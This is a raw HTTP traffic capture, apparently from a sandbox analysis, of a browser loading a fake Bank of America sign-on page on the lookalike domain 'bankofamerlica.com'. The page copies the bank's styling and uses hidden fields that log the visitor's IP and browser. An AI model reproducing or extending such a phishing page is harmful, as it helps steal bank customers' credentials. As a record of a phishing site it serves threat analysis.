2025-01-15 16:43:40 UTC	566	IN	HTTP/1.1 302 Found Date: Wed, 15 Jan 2025 16:43:40 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: stp=0; expires=Wed, 15-Jan-2025 17:43:40 GMT; Max-Age=3600; path=/ Set-Cookie: ppath=login%2Fsign-in%2FsignOnV2Screen.go; expires=Wed, 15-Jan-2025 17:43:40 GMT; Max-Age=3600; path=/ Location: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:40 UTC	948	OUT	GET /login/sign-in/signOnV2Screen.go HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://online.access.secure.bankofamerlica.com/secure/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:40 UTC	308	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:40 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-15 16:43:40 UTC	6	IN	Data Raw: 38 65 61 33 0d 0a Data Ascii: 8ea3
2025-01-15 16:43:40 UTC	7022	IN	Data Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 77 69 6e 20 66 66 20 66 66 2d 31 31 33 20 73 76 67 2d 62 67 20 6e 6f 74 2d 72 65 74 69 6e 61 20 63 66 2d 63 6e 78 2d 72 65 67 75 6c 61 72 2d 61 63 74 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 0d 0a 3c 68 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" class="win ff ff-113 svg-bg not-retina cf-cnx-regular-active" lang="en-US"><h
2025-01-15 16:43:40 UTC	16384	IN	Data Raw: 35 61 34 64 32 32 65 32 62 32 62 62 64 38 65 65 65 63 64 31 65 35 62 36 62 30 31 32 64 39 38 37 22 20 2f 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 22 20 6e 61 6d 65 3d 22 69 70 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 20 2f 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 69 64 3d 22 75 61 67 65 6e 74 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 75 61 67 65 6e 74 22 20 76 61 6c 75 65 3d 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f Data Ascii: 5a4d22e2b2bbd8eeecd1e5b6b012d987" /><input id="ip" name="ip" type="hidden" value="8.46.123.189" /><input id="uagent" type="hidden" name="uagent" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko
2025-01-15 16:43:40 UTC	13109	IN	Data Raw: 76 20 69 64 3d 22 72 65 73 74 65 73 74 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 30 2e 35 63 6d 3b 20 68 65 69 67 68 74 3a 20 30 2e 35 63 6d 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6f 6e 65 74 72 75 73 74 2d 63 6f 6e 73 65 6e 74 2d 73 64 6b 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 6e 65 74 72 75 73 74 2d 70 63 2d 64 61 72 6b 2d 66 69 6c 74 65 72 20 6f 74 2d 68 69 64 65 20 6f 74 2d 66 61 64 65 2d 69 6e 22 3e 3c 2f 64 69 76 3e 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 22 20 63 6c 61 73 73 3d 22 6f 74 50 63 54 61 62 20 6f 74 2d 68 69 64 65 20 6f 74 2d 66 61 64 65 2d 69 6e 20 6f 74 2d 73 64 6b 2d 6e 6f 74 2d 77 65 62 6b 69 74 20 6f 74 Data Ascii: v id="restest" style="width: 0.5cm; height: 0.5cm; padding: 0px"></div><div id="onetrust-consent-sdk"><div class="onetrust-pc-dark-filter ot-hide ot-fade-in"></div><div id="onetrust-pc-sdk" class="otPcTab ot-hide ot-fade-in ot-sdk-not-webkit ot
2025-01-15 16:43:40 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-15 16:43:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:41 UTC	814	OUT	GET /assets/vipaa-v4-jawr.css HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:41 UTC	275	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:41 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 21 Feb 2024 00:00:16 GMT ETag: "6e5d6-611d902fd6400" Accept-Ranges: bytes Content-Length: 452054 Vary: Accept-Encoding Connection: close Content-Type: text/css
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 2c 64 69 76 2c 64 6c 2c 64 74 2c 64 64 2c 75 6c 2c 6f 6c 2c 6c 69 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 72 65 2c 63 6f 64 65 2c 66 6f 72 6d 2c 66 69 65 6c 64 73 65 74 2c 6c 65 67 65 6e 64 2c 69 6e 70 75 74 2c 74 65 78 74 61 72 65 61 2c 70 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 74 68 2c 74 64 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 74 61 62 6c 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 7d 66 69 Data Ascii: html{background:#FFF;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0}fi
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 37 62 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 23 30 30 37 64 63 33 2c 23 30 30 36 37 62 31 29 7d 2e 62 74 6e 2d 62 6f 66 61 2d 62 6c 75 65 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 62 74 6e 2d 62 6f 66 61 2d 62 6c 75 65 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 32 34 65 38 39 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 36 38 62 32 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 30 20 30 2c 30 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 30 30 36 37 62 31 29 2c 74 6f 28 23 30 30 37 64 63 33 29 29 3b 62 61 63 6b 67 72 6f Data Ascii: 7b1);background-image:linear-gradient(#007dc3,#0067b1)}.btn-bofa-blue:visited{color:#fff}.btn-bofa-blue:hover{color:#fff;border-color:#124e89;background-color:#0068b2;background-image:-webkit-gradient(linear,0 0,0 bottom,from(#0067b1),to(#007dc3));backgro
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 62 75 74 74 6f 6e 5f 61 2e 67 69 66 27 29 20 63 65 6e 74 65 72 20 72 69 67 68 74 20 6e 6f 2d 72 65 70 65 61 74 3b 63 6f 6c 6f 72 3a 23 65 63 31 63 30 32 3b 6f 75 74 6c 69 6e 65 3a 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 20 73 70 61 6e 2c 61 2e 62 75 74 74 6f 6e 3a 66 6f 63 75 73 20 73 70 61 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 20 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 32 70 78 20 30 20 35 70 78 20 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 61 2e 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 2e 75 69 2d 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 20 61 2e 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 23 Data Ascii: button_a.gif') center right no-repeat;color:#ec1c02;outline:0;text-decoration:none}a.button:hover span,a.button:focus span{background-position:center left;padding:2px 0 5px 12px;white-space:nowrap}a.button:focus,.ui-widget-content a.button:focus{outline:#
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 2d 61 72 72 6f 77 7b 6c 65 66 74 3a 61 75 74 6f 3b 72 69 67 68 74 3a 2d 32 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 70 61 2f 67 6c 6f 62 61 6c 2d 61 73 73 65 74 73 2f 31 2e 30 2f 67 72 61 70 68 69 63 2f 64 69 61 6c 6f 67 5f 61 72 72 6f 77 5f 72 69 67 68 74 2e 70 6e 67 27 29 7d 2e 75 69 2d 64 69 61 6c 6f 67 2e 62 6f 61 2d 61 63 74 69 6f 6e 2d 6e 6f 74 69 74 6c 65 20 2e 75 69 2d 64 69 61 6c 6f 67 2d 74 69 74 6c 65 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 70 61 2f 67 6c 6f 62 61 6c 2d 61 73 73 65 74 73 2f 31 2e 30 2f 67 72 61 70 68 69 63 2f 64 69 61 6c 6f 67 5f Data Ascii: -arrow{left:auto;right:-25px;background-image:url('../../../../../../../../pa/global-assets/1.0/graphic/dialog_arrow_right.png')}.ui-dialog.boa-action-notitle .ui-dialog-titlebar{background:url("../../../../../../../../pa/global-assets/1.0/graphic/dialog_
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 64 65 72 2d 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 30 20 30 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 75 69 2d 64 69 61 6c 6f 67 2e 62 6f 61 2d 63 6f 6d 2d 74 61 73 6b 2d 6c 61 79 65 72 2e 62 6f 61 2d 74 61 73 6b 2d 6c 61 79 65 72 2d 6d 69 6e 69 20 2e 75 69 2d 64 69 61 6c 6f 67 2d 74 69 74 6c 65 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 70 78 7d 2e 69 65 2d 37 20 2e 75 69 2d 64 69 61 6c 6f 67 2e 62 6f 61 2d 63 6f 6d 2d 74 61 73 6b 2d 6c 61 79 65 72 2e 62 6f 61 2d 74 61 73 6b 2d 6c 61 79 65 72 2d 6d 69 6e 69 20 2e 75 69 2d 64 69 61 6c 6f 67 2d 74 69 74 6c 65 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 75 69 2d 64 69 61 6c 6f 67 2e 62 6f 61 2d 63 6f 6d 2d Data Ascii: der-top:0;padding:4px 0 0 0;min-height:0!important}.ui-dialog.boa-com-task-layer.boa-task-layer-mini .ui-dialog-title{border-bottom:0;padding-bottom:2px}.ie-7 .ui-dialog.boa-com-task-layer.boa-task-layer-mini .ui-dialog-title{padding:0}.ui-dialog.boa-com-
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 39 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 36 30 70 78 7d 2e 74 6f 70 2d 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 3b 6c 65 66 74 3a 2d 31 70 78 3b 74 6f 70 3a 2d 31 70 78 7d 2e 74 6f 70 2d 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 35 70 78 20 30 3b 72 69 67 68 74 3a 2d 31 70 78 3b 74 6f 70 3a 2d 31 70 78 7d 2e 62 6f 74 74 6f 6d 2d 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 35 70 78 3b 62 6f 74 74 6f 6d 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 31 70 78 7d 2e 62 6f 74 74 6f 6d 2d 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 35 70 78 20 35 70 78 3b 62 6f 74 74 6f 6d 3a 2d 31 70 Data Ascii: 9px no-repeat;padding-left:60px}.top-left{background-position:0 0;left:-1px;top:-1px}.top-right{background-position:5px 0;right:-1px;top:-1px}.bottom-left{background-position:0 5px;bottom:-1px;left:-1px}.bottom-right{background-position:5px 5px;bottom:-1p
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 70 61 2f 67 6c 6f 62 61 6c 2d 61 73 73 65 74 73 2f 31 2e 30 2f 67 72 61 70 68 69 63 2f 74 72 61 6e 73 63 63 2d 73 70 72 69 74 65 2e 70 6e 67 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 20 2d 34 34 35 70 78 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 35 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 73 73 61 67 69 6e 67 2d 76 69 70 61 61 2d 6d 6f 64 75 6c 65 20 2e 65 72 72 6f 72 2d 74 72 61 6e 73 2d 73 6b 69 6e 20 2e 65 72 72 6f 72 2d 69 6d 61 67 65 2c 2e 66 61 75 78 64 61 6c 2d 76 69 70 61 61 2d 6d 6f 64 75 6c 65 20 2e 74 72 61 6e 73 63 63 2d 73 6b 69 6e 20 2e 65 72 72 6f 72 2d 69 6d 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2e Data Ascii: ../../../../../../pa/global-assets/1.0/graphic/transcc-sprite.png") no-repeat scroll 0 -445px transparent;padding-left:25px!important}.messaging-vipaa-module .error-trans-skin .error-image,.fauxdal-vipaa-module .transcc-skin .error-image{background:url(".
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 6f 6d 3a 34 35 70 78 7d 2e 74 77 6f 2d 72 6f 77 2d 66 6c 65 78 2d 77 69 64 65 6c 65 66 74 2d 6c 61 79 6f 75 74 20 2e 66 6f 6f 74 65 72 20 2e 6f 6c 62 2d 66 6f 6f 74 65 72 2d 6d 6f 64 75 6c 65 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 74 77 6f 2d 72 6f 77 2d 66 6c 65 78 2d 77 69 64 65 6c 65 66 74 2d 6c 61 79 6f 75 74 20 2e 68 65 61 64 65 72 20 2e 70 61 67 65 2d 6c 65 76 65 6c 2d 6d 65 73 73 61 67 65 2d 6d 6f 64 75 6c 65 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 31 32 70 78 20 30 7d 2e 74 77 6f 2d 72 6f 77 2d 66 6c 65 78 2d 77 69 64 65 6c 65 66 74 2d 6c 61 79 6f 75 74 20 2e 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 2d 6d 6f 64 75 6c 65 20 2e 6c 6f 67 6f 2d 74 65 78 74 2d 73 6b 69 6e 7b 6d 61 72 67 69 6e Data Ascii: om:45px}.two-row-flex-wideleft-layout .footer .olb-footer-module{padding-bottom:20px;width:100%}.two-row-flex-wideleft-layout .header .page-level-message-module{margin:20px 12px 0}.two-row-flex-wideleft-layout .header .header-module .logo-text-skin{margin
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 65 6f 20 2e 76 69 64 65 6f 2d 63 6f 6e 74 72 6f 6c 2d 62 61 72 20 2e 76 6f 6c 75 6d 65 2d 62 61 72 2d 66 69 6c 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 63 63 63 3b 77 69 64 74 68 3a 34 30 70 78 3b 68 65 69 67 68 74 3a 33 70 78 3b 62 6f 72 64 65 72 3a 35 70 78 20 73 6f 6c 69 64 20 23 32 34 32 34 32 34 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 32 35 70 78 3b 74 6f 70 3a 31 31 70 78 7d 2e 62 6f 66 61 56 69 64 65 6f 20 2e 76 69 64 65 6f 2d 63 6f 6e 74 72 6f 6c 2d 62 61 72 20 2e 76 6f 6c 75 6d 65 2d 62 61 72 2d 66 69 6c 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 35 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 3a 34 70 78 20 73 6f 6c Data Ascii: eo .video-control-bar .volume-bar-fill{background:#ccc;width:40px;height:3px;border:5px solid #242424;position:absolute;left:25px;top:11px}.bofaVideo .video-control-bar .volume-bar-fill{background:#fff!important;height:5px!important;width:0;border:4px sol
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 6f 6e 73 2d 63 6f 6e 74 65 6e 74 20 2e 74 65 72 6d 73 2d 63 6f 6e 64 69 74 69 6f 6e 73 20 6f 6c 2e 64 65 73 63 72 69 70 74 69 6f 6e 20 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 65 63 69 6d 61 6c 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 65 6c 65 63 74 72 6f 6e 69 63 2d 63 6f 6d 6d 2d 64 69 73 63 6c 6f 73 75 72 65 2d 6d 6f 64 75 6c 65 20 2e 74 65 72 6d 73 2d 63 6f 6e 64 69 74 69 6f 6e 73 2d 63 6f 6e 74 65 6e 74 20 2e 74 65 72 6d 73 2d 63 6f 6e 64 69 74 69 6f 6e 73 20 6f 6c 2e 64 65 73 63 72 69 70 74 69 6f 6e 20 6c 69 20 6f 6c 20 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 75 70 70 65 72 2d 61 6c 70 68 61 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 6d Data Ascii: ons-content .terms-conditions ol.description li{list-style-type:decimal;margin-left:20px;font-weight:bold}.electronic-comm-disclosure-module .terms-conditions-content .terms-conditions ol.description li ol li{list-style-type:upper-alpha;padding-top:10px;m

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:41 UTC	815	OUT	GET /assets/onetrust-style.css HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:41 UTC	275	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:41 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 14:00:16 GMT ETag: "1c6b4-6118029db7c00" Accept-Ranges: bytes Content-Length: 116404 Vary: Accept-Encoding Connection: close Content-Type: text/css
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 09 23 6f 6e 65 74 72 75 73 74 2d 62 61 6e 6e 65 72 2d 73 64 6b 20 7b 0d 0a 09 09 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0d 0a 09 09 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 0d 0a 09 7d 0d 0a 09 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 62 61 6e 6e 65 72 2d 73 64 6b 20 2e 6f 6e 65 74 72 75 73 74 2d 76 65 6e 64 6f 72 73 2d 6c 69 73 74 2d 68 61 6e 64 6c 65 72 20 7b 0d 0a 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 31 66 39 36 64 62 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a Data Ascii: #onetrust-banner-sdk {-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%}#onetrust-banner-sdk .onetrust-vendors-list-handler {cursor: pointer;color: #1f96db;font-size: inherit;font-weight: bold;text-decoration:
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 3a 20 31 2e 32 0d 0a 09 7d 0d 0a 09 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 62 61 6e 6e 65 72 2d 73 64 6b 20 68 32 2c 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 68 32 2c 0d 0a 09 23 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 20 68 32 20 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 0d 0a 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 35 0d 0a 09 7d 0d 0a 09 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 62 61 6e 6e 65 72 2d 73 64 6b 20 68 33 2c 0d 0a 09 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 20 68 33 2c 0d 0a 09 23 6f 74 2d 73 64 6b 2d 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 20 68 33 20 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 0d 0a 09 09 6c 69 6e 65 2d 68 65 69 67 Data Ascii: : 1.2}#onetrust-banner-sdk h2,#onetrust-pc-sdk h2,#ot-sdk-cookie-policy h2 {font-size: 1.5rem;line-height: 1.25}#onetrust-banner-sdk h3,#onetrust-pc-sdk h3,#ot-sdk-cookie-policy h3 {font-size: 1.5rem;line-heig
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 6e 6e 65 72 2d 73 64 6b 20 23 6f 6e 65 74 72 75 73 74 2d 72 65 6a 65 63 74 2d 61 6c 6c 2d 68 61 6e 64 6c 65 72 2c 0d 0a 09 09 23 6f 6e 65 74 72 75 73 74 2d 62 61 6e 6e 65 72 2d 73 64 6b 20 23 6f 6e 65 74 72 75 73 74 2d 70 63 2d 62 74 6e 2d 68 61 6e 64 6c 65 72 20 7b 0d 0a 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 0d 0a 09 09 7d 0d 0a 09 09 23 6f 6e 65 74 72 75 73 74 2d 62 61 6e 6e 65 72 2d 73 64 6b 20 2e 6f 6e 65 74 72 75 73 74 2d 63 6c 6f 73 65 2d 62 74 6e 2d 75 69 20 7b 0d 0a 09 09 09 74 6f 70 3a 20 61 75 74 6f 3b 0d 0a 09 09 09 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 0d 0a 09 09 7d 0d 0a 09 09 23 6f 6e 65 74 72 75 73 74 2d 62 61 6e 6e 65 72 2d 73 64 6b 20 23 6f 6e 65 74 72 75 73 74 2d 70 6f 6c 69 63 79 2d 74 69 74 6c 65 20 7b 0d 0a 09 09 09 64 69 Data Ascii: nner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler {width: 100%}#onetrust-banner-sdk .onetrust-close-btn-ui {top: auto;transform: none}#onetrust-banner-sdk #onetrust-policy-title {di
